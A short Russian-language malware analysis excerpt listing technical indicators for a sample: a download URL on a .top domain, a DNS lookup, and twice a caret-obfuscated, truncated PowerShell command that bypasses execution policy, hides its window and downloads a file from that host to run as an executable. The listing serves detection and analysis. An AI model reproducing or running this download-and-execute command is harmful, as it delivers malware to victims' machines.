Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweRS^hELl^.^exe -eXE^C^Utio^npOliC^Y ^bYp^As^S^ ^-n^o^pr^ofIl^e -^W^inD^O^wsty^l^E ^HID^dEn^ (new^-OB^jEcT^ ^syst^Em.nET.wEB^C^LiENt).^dOWNLOAD^fi^lE(^'http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POweRS^hELl^.^exe -eXE^C^Utio^npOliC^Y ^bYp^As^S^ ^-n^o^pr^ofIl^e -^W^inD^O^wsty^l^E ^HID^dEn^ (new^-OB^jEcT^ ^syst^Em.nET.wEB^C^LiENt).^dOWNLOAD^fi^lE(^'http://www.doorasope.to...' (со скрытым окном)